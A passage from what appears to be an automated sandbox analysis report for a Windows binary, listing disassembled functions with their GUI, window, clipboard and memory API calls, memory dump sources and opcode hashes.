InflateRect.USER32(00000000,000000FC,000000FB), ref: 005B36AE

Part of subcall function 004E03A2: __EH_prolog3.LIBCMT ref: 004E03A9
Part of subcall function 004E03A2: GetDC.USER32(00000000), ref: 004E03D5

GetClientRect.USER32(00000000,?), ref: 005B373B
InflateRect.USER32(?,000000FF,000000FF), ref: 005B3749
GetSystemMetrics.USER32(00000002), ref: 005B3751

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: Rect$ClientInflateMetricsSystem$H_prolog3H_prolog3_
String ID:
API String ID: 1524981428-0
Opcode ID: d7e573fa2f9701fcf97e0cfb8ee3fb371fe7b9048af26d22bc0bc73777e2a5ba
Instruction ID: 3202a14860766cdd9b77f218b08ce72228e58be2073854e654c484b5d49f48bf
Opcode Fuzzy Hash: d7e573fa2f9701fcf97e0cfb8ee3fb371fe7b9048af26d22bc0bc73777e2a5ba
Instruction Fuzzy Hash: 52715871900219DFCF14DFA8C885AEDBBB1FF48310F25422EE915BB285DB74AA45CB50

Function 004F4218 Relevance: 10.7, APIs: 7, Instructions: 176windowCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 004F4222

Part of subcall function 00524CC5: __EH_prolog3.LIBCMT ref: 00524CCC

GetMenuItemCount.USER32(?), ref: 004F428C
GetMenuItemID.USER32(?,?), ref: 004F42AF
GetMenuItemCount.USER32(?), ref: 004F42F2
GetMenuItemID.USER32(?,?), ref: 004F4326
SendMessageW.USER32(?,00000234,00000000,00000000), ref: 004F4398
GetMenuState.USER32(?,?,00000400), ref: 004F43F0

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: Menu$Item$Count$H_prolog3H_prolog3_MessageSendState
String ID:
API String ID: 999183886-0
Opcode ID: 57e1a075c4ffee6f8cb0b197ecf57ae7a0ff23d4eb85da556b3e0c70e13de9bd
Instruction ID: ba95adc2fbbb9f3115350d2b3840791acd1c2a2af03915281be0538fd6b061f3
Opcode Fuzzy Hash: 57e1a075c4ffee6f8cb0b197ecf57ae7a0ff23d4eb85da556b3e0c70e13de9bd
Instruction Fuzzy Hash: 65713B3180016A9BCF249F64CC85BFEB7B5BB85314F1442EAEA29A3291CB355E81DF54

Function 00528149 Relevance: 10.7, APIs: 7, Instructions: 174COMMON

Download Yara Rule

APIs

Part of subcall function 00525F25: __EH_prolog3_GS.LIBCMT ref: 00525F2C
Part of subcall function 00525F25: GetDesktopWindow.USER32 ref: 00525F3A
Part of subcall function 00525F25: SetRectEmpty.USER32(?), ref: 00525F71
Part of subcall function 00525F25: SetRectEmpty.USER32(?), ref: 00525F83
Part of subcall function 00525F25: CopyRect.USER32(?,?), ref: 00525F8E
Part of subcall function 00525F25: CopyRect.USER32(?,?), ref: 00525FAA

SetRectEmpty.USER32(?), ref: 00528185
ClientToScreen.USER32(?,?), ref: 005281AD
IsRectEmpty.USER32(?), ref: 005281D6
GetParent.USER32(?), ref: 005281E3
GetCursorPos.USER32(?), ref: 00528208
IsRectEmpty.USER32(?), ref: 005282BE
EqualRect.USER32(?,?), ref: 005282D0

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: Rect$Empty$Copy$ClientCursorDesktopEqualH_prolog3_ParentScreenWindow
String ID:
API String ID: 1345960709-0
Opcode ID: e01f631bbcc38ed4b7dafa0044e24ddd888a1358fcb4ce1308f848cab7a4049e
Instruction ID: a8354666230001512840838b324feac933aff87bea8f3b6cdee17dfd9e04c460
Opcode Fuzzy Hash: e01f631bbcc38ed4b7dafa0044e24ddd888a1358fcb4ce1308f848cab7a4049e
Instruction Fuzzy Hash: 6E513C71A01529AFCF05DFA4D8889EEBBBAFF49710B14452AF811F7290DB719944CBA0

Function 005094BC Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 161keyboardCOMMON

Download Yara Rule

APIs

ReleaseCapture.USER32 ref: 00509545
GetKeyState.USER32(00000011), ref: 0050957E
GetCursorPos.USER32(?), ref: 005095ED

Strings

Dc, xrefs: 00509611
c, xrefs: 005096B0
c, xrefs: 0050956A

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: CaptureCursorReleaseState
String ID: Dc$c$c
API String ID: 3832350104-3725593719
Opcode ID: 2fb609ce449393755db4e1b2d204a4e613bdcad75b88123a022af0606d5689be
Instruction ID: 7d2b4e1294a058cb97b57e9be29113353331e675826f9978e29bf77648006a41
Opcode Fuzzy Hash: 2fb609ce449393755db4e1b2d204a4e613bdcad75b88123a022af0606d5689be
Instruction Fuzzy Hash: 0451BE34600201EFDB259FB9C888BAEBFA5FF49700F18446EE556872D6EB71AD40CB51

Function 0053CCF3 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 155windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000407,00000000,?), ref: 0053CD82
PostMessageW.USER32(?,0000001F,00000000,00000000), ref: 0053CDBC
GetParent.USER32(?), ref: 0053CE4F
GetParent.USER32(?), ref: 0053CE7F
GetCapture.USER32 ref: 0053CE9A

Strings

c, xrefs: 0053CE58

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: MessageParent$CapturePostSend
String ID: c
API String ID: 3593767962-2927717585
Opcode ID: 78d1ad0ce9d3f1f165fbf4bf501778a193e9b397529d82738ba275aeba4ec554
Instruction ID: ee6c476d70e152f5a705f6a61c5f7e1880e814b132abbea9b393082bdc1c0b9a
Opcode Fuzzy Hash: 78d1ad0ce9d3f1f165fbf4bf501778a193e9b397529d82738ba275aeba4ec554
Instruction Fuzzy Hash: 5051AD32A003419BEF366A64CC88B797F99BB04701F19497AF549EB2D2CB75DC80E752

Function 005B2F7E Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 151COMMON

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 005B2F85

Part of subcall function 005B2EF6: OleGetClipboard.OLE32(?), ref: 005B2F0E

ReleaseStgMedium.OLE32(?), ref: 005B2FFA
ReleaseStgMedium.OLE32(?), ref: 005B303F
CoTaskMemFree.OLE32(?), ref: 005B30E7
ReleaseStgMedium.OLE32(?), ref: 005B305F

Part of subcall function 004D8E6A: _malloc.LIBCMT ref: 004D8E88

Strings

', xrefs: 005B2FC1

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: MediumRelease$ClipboardFreeH_prolog3_catchTask_malloc
String ID: '
API String ID: 3930503942-1997036262
Opcode ID: c4d90cf85c30fcd61f734debf58f9ea39eaf77bbcc3448b918511e8343c60dda
Instruction ID: fda87d8cb06be1f3f785f1355f05f03b8c1dc9b4bcdd9d26b8f794d08b07e08f
Opcode Fuzzy Hash: c4d90cf85c30fcd61f734debf58f9ea39eaf77bbcc3448b918511e8343c60dda
Instruction Fuzzy Hash: 2A511971900209EECF10EFA5C999AFD7BB5BF48304F20446EF505EA281DA79AB44DB61

Function 00522412 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 134COMMON

Download Yara Rule

APIs

MonitorFromPoint.USER32(?,?,00000002), ref: 005224F4
GetMonitorInfoW.USER32(00000000), ref: 005224FB
CopyRect.USER32(?,?), ref: 0052250D
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 0052251D
IntersectRect.USER32(?,?,?), ref: 00522550

Strings

(, xrefs: 005224ED

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: InfoMonitorRect$CopyFromIntersectParametersPointSystem
String ID: (
API String ID: 2931574886-3887548279
Opcode ID: 93623997f0be0cf1ae6e972b3c72f2da67bef16a142bb8713e17972daa3cccf3
Instruction ID: e0a796985b570dee23a544e71567fd8b74535caad18d066f49be0a332a9bc7e7
Opcode Fuzzy Hash: 93623997f0be0cf1ae6e972b3c72f2da67bef16a142bb8713e17972daa3cccf3
Instruction Fuzzy Hash: DF51E9B5E00219AFCB24DFA9D9889AEFBF9FF59300F10851AE415E7250D774AA04CF61

Function 004F87DD Relevance: 10.6, APIs: 7, Instructions: 126COMMON

Download Yara Rule

APIs

Part of subcall function 00549B37: __EH_prolog3_catch.LIBCMT ref: 00549B3E

UpdateWindow.USER32(?), ref: 004F8871
EqualRect.USER32(?,?), ref: 004F88A7
InflateRect.USER32(?,00000002,00000002), ref: 004F88BF
InvalidateRect.USER32(?,?,00000001), ref: 004F88CE
InflateRect.USER32(?,00000002,00000002), ref: 004F88E3
InvalidateRect.USER32(?,?,00000001), ref: 004F88F5
UpdateWindow.USER32(?), ref: 004F88FE

Part of subcall function 004F83AB: InvalidateRect.USER32(?,?,00000001,?), ref: 004F8420
Part of subcall function 004F83AB: InflateRect.USER32(?,?,?), ref: 004F8466
Part of subcall function 004F83AB: RedrawWindow.USER32(?,?,00000000,00000401,?,?), ref: 004F8479

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: Rect$InflateInvalidateWindow$Update$EqualH_prolog3_catchRedraw
String ID:
API String ID: 1041772997-0
Opcode ID: a6c6c9def279eca8dce0456d5a26b5a49e11b1b2c724b1f2921efb411f35bfc0
Instruction ID: b05d9c67bbe1349a746007f979ee4fde30f4687eb2c282500b83b189302de495
Opcode Fuzzy Hash: a6c6c9def279eca8dce0456d5a26b5a49e11b1b2c724b1f2921efb411f35bfc0
Instruction Fuzzy Hash: 414148716002099FCF11DF64C888BBB7BA9FB48314F144279ED0AEE292DB759945CB61

Function 004E8A11 Relevance: 10.6, APIs: 7, Instructions: 117windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 004E8A44
PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 004E8A68
UpdateWindow.USER32(?), ref: 004E8A83
SendMessageW.USER32(?,00000121,00000000,?), ref: 004E8AA4
SendMessageW.USER32(?,0000036A,00000000,00000002), ref: 004E8ABC
UpdateWindow.USER32(?), ref: 004E8AFF
PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 004E8B30

Part of subcall function 004ECBFE: GetWindowLongW.USER32(?,000000F0), ref: 004ECC09

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: Message$Window$PeekSendUpdate$LongParent
String ID:
API String ID: 2853195852-0
Opcode ID: 2696f7a0a9e327c493a95891765643f2ab33bc4581a787e57482186f71bc261e
Instruction ID: 45283a61be1527cf2120b797ace0c49dfd946447b0a7270561b6453cc6625156
Opcode Fuzzy Hash: 2696f7a0a9e327c493a95891765643f2ab33bc4581a787e57482186f71bc261e
Instruction Fuzzy Hash: B8417170900685EBCF219F57CC48EAFBBB4FF90706F14416FE445A22A1DB799940DB58

Function 0059A647 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 113COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 0059A64E

Part of subcall function 0055C236: __EH_prolog3.LIBCMT ref: 0055C23D

Part of subcall function 005B236A: SetRectEmpty.USER32(?), ref: 005B239A

SetRectEmpty.USER32(?), ref: 0059A796
SetRectEmpty.USER32(?), ref: 0059A7A5
SetRectEmpty.USER32(?), ref: 0059A7AE

Strings

True, xrefs: 0059A7B9
False, xrefs: 0059A805

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: EmptyRect$H_prolog3
String ID: False$True
API String ID: 3752103406-1895882422
Opcode ID: 811c2738f18775302e4a0651406bc71a301da3e0ff9c6974c17bb6a7a4a5b041
Instruction ID: de4e19f84396bc765e1ac2741ed397b989d87ac40a674322abf701ea1cede548
Opcode Fuzzy Hash: 811c2738f18775302e4a0651406bc71a301da3e0ff9c6974c17bb6a7a4a5b041
Instruction Fuzzy Hash: AD51B0B0801B458FD762DF7AC5957DAFBE8BFA4304F10494FE0AE862A1DBB42644CB15

Function 004F0833 Relevance: 10.6, APIs: 7, Instructions: 111COMMON

Download Yara Rule

APIs

Part of subcall function 004F07A0: _malloc.LIBCMT ref: 004F07B3

_free.LIBCMT ref: 004F085C
_memset.LIBCMT ref: 004F0875
_memset.LIBCMT ref: 004F08AF
_memcpy_s.LIBCMT ref: 004F08C9
CreateDIBSection.GDI32(00000000,00000000,00000000,00000008,00000000,00000000), ref: 004F08E2
_free.LIBCMT ref: 004F08F4
_free.LIBCMT ref: 004F0927

Part of subcall function 005CE216: HeapFree.KERNEL32(00000000,00000000,?,005D5DB2,00000000,?,005D4298,?,00000001,?,?,005D6FC6,00000018,00638280,0000000C,005D7056), ref: 005CE22C
Part of subcall function 005CE216: GetLastError.KERNEL32(00000000,?,005D5DB2,00000000,?,005D4298,?,00000001,?,?,005D6FC6,00000018,00638280,0000000C,005D7056,?), ref: 005CE23E

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: _free$_memset$CreateErrorFreeHeapLastSection_malloc_memcpy_s
String ID:
API String ID: 2204576675-0
Opcode ID: 5bba704747f580aed307c10b59a6f33da992abf9dda235af61e3d0ab892bff55
Instruction ID: 166669ff0e17f531fbc60860b85ca3b784eb1aa8935e0a15821b49947a695adb
Opcode Fuzzy Hash: 5bba704747f580aed307c10b59a6f33da992abf9dda235af61e3d0ab892bff55
Instruction Fuzzy Hash: 7E31E8B6900219ABE720EF61CC05F7B77ACEF51364F10442AEA41E7242E778ED0087D4

Function 00523060 Relevance: 10.6, APIs: 7, Instructions: 110windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 00523093

Part of subcall function 00530419: RedrawWindow.USER32(?,00000000,00000000,00000105), ref: 00530490

IsWindowVisible.USER32(?), ref: 005230BD
IsWindowVisible.USER32(?), ref: 00523101
RedrawWindow.USER32(?,00000000,00000000,00000585), ref: 00523123
RedrawWindow.USER32(?,00000000,00000000,00000501), ref: 00523135
RedrawWindow.USER32(?,00000000,00000000,00000105), ref: 00523157
RedrawWindow.USER32(?,?,00000000,00000541), ref: 00523188

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: Window$Redraw$Visible
String ID:
API String ID: 1637130220-0
Opcode ID: 79fc6a3bae74230fd922a335521167e76ef65c09428c4f469ea7c1a628f48066
Instruction ID: 85d366d4eada84dd961b3a932291b94e77773b04448638e1ea39b60730c5c479
Opcode Fuzzy Hash: 79fc6a3bae74230fd922a335521167e76ef65c09428c4f469ea7c1a628f48066
Instruction Fuzzy Hash: 5A416A71A0031AEFDB20AF65DD80ABABBBAFF45305F10047DE14A962A1D7349E51DF60

Function 004E90A1 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 110windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 004E913A
SendMessageW.USER32(00000000,00000433,00000000,?), ref: 004E9163
GetWindowLongW.USER32(?,000000FC), ref: 004E9175
GetWindowLongW.USER32(?,000000FC), ref: 004E9186
SetWindowLongW.USER32(?,000000FC,?), ref: 004E91A2

Strings

,, xrefs: 004E9159

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: LongWindow$MessageSend_memset
String ID: ,
API String ID: 2997958587-3772416878
Opcode ID: 01a9d8859fb04fb6bb57442a5715571c3b7a175de6fae57f05e5839b23566a0b
Instruction ID: 89f293a8d6da2b78cb2f3954595053074227b9658e0c4572e50451840579f413
Opcode Fuzzy Hash: 01a9d8859fb04fb6bb57442a5715571c3b7a175de6fae57f05e5839b23566a0b
Instruction Fuzzy Hash: 99419E706003459FDB20EF76C888A6EB7E5BF48315F14062EE48297792DB38ED04CB58

Function 004D7310 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 102COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 004D733D
std::_Lockit::_Lockit.LIBCPMT ref: 004D7360
std::bad_exception::bad_exception.LIBCMT ref: 004D73E4
__CxxThrowException@8.LIBCMT ref: 004D73F2
std::_Lockit::_Lockit.LIBCPMT ref: 004D7405

Strings

h*b, xrefs: 004D73DC

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: LockitLockit::_std::_$Exception@8Throwstd::bad_exception::bad_exception
String ID: h*b
API String ID: 2513498551-3147924297
Opcode ID: 64fba683b71f4f0603b7557daaed3466852c98166affa515a59b130502ecc2e8
Instruction ID: ee1d1a4f6322fcae045fb66e433cf026cf6fbf690344fd797f4a2681fe0b41cf
Opcode Fuzzy Hash: 64fba683b71f4f0603b7557daaed3466852c98166affa515a59b130502ecc2e8
Instruction Fuzzy Hash: 6E31BF759442069FDB28DF54C855BAEBBB4FB01320F51461BEC55A73A1EB34AD00CBA1

Function 004D66B0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 99COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 004D66DC
std::_Lockit::_Lockit.LIBCPMT ref: 004D66FF
std::bad_exception::bad_exception.LIBCMT ref: 004D6780
__CxxThrowException@8.LIBCMT ref: 004D678E
std::_Lockit::_Lockit.LIBCPMT ref: 004D67A1

Strings

bad cast, xrefs: 004D6778

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
